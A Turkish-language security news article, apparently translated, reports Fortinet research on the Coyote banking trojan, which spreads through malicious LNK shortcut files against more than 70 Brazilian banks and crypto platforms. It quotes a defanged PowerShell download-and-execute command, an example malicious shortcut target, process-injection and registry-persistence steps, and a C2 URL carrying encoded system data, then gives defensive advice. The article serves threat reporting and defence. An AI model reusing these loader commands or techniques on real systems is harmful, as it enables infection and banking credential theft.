Brezilya’daki finansal kurumları hedefleyen Coyote Bankacılık Truva atından yararlanan yeni bir siber saldırı dalgası tespit edildi.
Bu sofistike kötü amaçlı yazılım, PowerShell komut dosyalarını yürütmek için bir giriş noktası olarak kötü niyetli Windows LNK (kısayol) dosyalarını kullanır ve veri hırsızlığı ve sistem uzlaşmasıyla sonuçlanan çok aşamalı enfeksiyon zincirlerini sağlar.
Saldırı, gizli bir PowerShell komutunu yürüten kötü niyetli bir LNK dosyasıyla başlar.
Bu komut, ek yükler indirmek için uzak bir sunucuya bağlanır. İlk PowerShell betiği aşağıdaki gibidir:-
-w hid -noni -ep Bypass -c "Start-Job -Name PSSGR -ScriptBlock { IEX (iwr -Uri 'hxxps://tbet[.]geontrigame[.]com/zxchzzmism' -UseBasicParsing).Content }; Start-Sleep 131."Fortinet araştırmacıları, bu senaryo, saldırının bir sonraki aşamasını yüklemek için kod çözülen ve yürütülen kodlanmış kabuk kodunun indirilmesini başlattığını belirtti.
.webp)
Saldırı süreci
- LNK Dosya Sömürü: Kısayol dosyası, “hedef” alanına kötü niyetli argümanlar ekleyecek şekilde hazırlanmıştır. Yürütme üzerine, gömülü Powershell betiğini tetikler.
- Örnek Hedef Yol:
cmd.exe /c powershell.exe -ExecutionPolicy Bypass -File malicious.ps1.
.webp)
- Yük dağıtım: İndirilen komut dosyası, iki gömülü veri segmentini çözer ve bunları gibi Windows API işlevlerini kullanarak belleğe enjekte eder
VirtualAllocExVeWriteProcessMemory. Bu işlem bir yükleyici DLL tarafından kolaylaştırılır (bmwiMcDec), kullananCreateRemoteThreadEnjekte edilen kodu yürütmek için. - Kalıcılık mekanizması: Kötü amaçlı yazılım, Windows kayıt defterini şu adreste değiştirir:-
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunSonraki yük yürütme için Base64 kodlu bir PowerShell komutunu işaret eden randomize bir adla yeni bir giriş oluşturur.
- Komuta ve Kontrol (C2) İletişim: Coyote, SSL kanallarını kullanarak C2 sunucularıyla güvenli iletişim kurar. Base64’te kodlanmış ve gizleme için tersine çevrilmiş makine adı, kullanıcı adı ve antivirüs detayları dahil olmak üzere sistem bilgilerini iletir. Örnek URL:
hxxps://yezh[.]geontrigame[.]com/hqizjs/?I=y4CMuADfvJHUgATMgM3dvRmbpdFIOZ2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfzImcoNEfOIDROUIKötü amaçlı yazılım, anahtarlama ve ekran görüntüsü yakalama, bankacılık arayüzlerini taklit etmek, süreçleri sona erdirmek ve sistemleri kapatma ve “güncellemeler üzerinde çalışma” gibi aldatıcı mesajlarla kullanıcı erişimini engellemek gibi kimlik avı kaplamaları görüntüleme gibi çok sayıda yetenek sunar.
Coyote, NIM ve Node.js gibi modern programlama araçlarını kullanır ve gizliliğini ve karmaşıklığını artırır.
Kötü amaçlı yazılım, meşru yürütülebilir ürünler aracılığıyla DLL yan yükleme kullanır (obs-browser-page.exe) tespitten kaçınmak için.
Ayrıca, Squirrel yükleyici çerçevesini dağıtım için kullanır ve kendini meşru bir güncelleme paketi olarak gizler.
Coyote öncelikle 70’den fazla Brezilya finans kurumunu ve kripto para birimi platformunu hedeflemektedir.
Belirli bankacılık uygulamaları veya web siteleri için aktif pencereleri izler ve tespit edildiğinde kötü niyetli işlemler başlatır.
Bu tür tehditlere karşı korumak için, istenmeyen LNK dosyalarını açmaktan kaçının ve antivirüs yazılımının LNK/Agent.D! TR gibi tehditleri tespit edebilen imzalarla düzenli olarak güncellendiğinden emin olun.
Yetkisiz girişler için kayıt defteri değişikliklerinin izlenmesi, şüpheli aktivitenin tespit edilmesine yardımcı olurken, uç nokta algılama araçlarının uygulanması potansiyel tehditler için PowerShell etkinliğinin analizini sağlar.
Collect Threat Intelligence with TI Lookup to Improve Your Company’s Security - Get 50 Free Request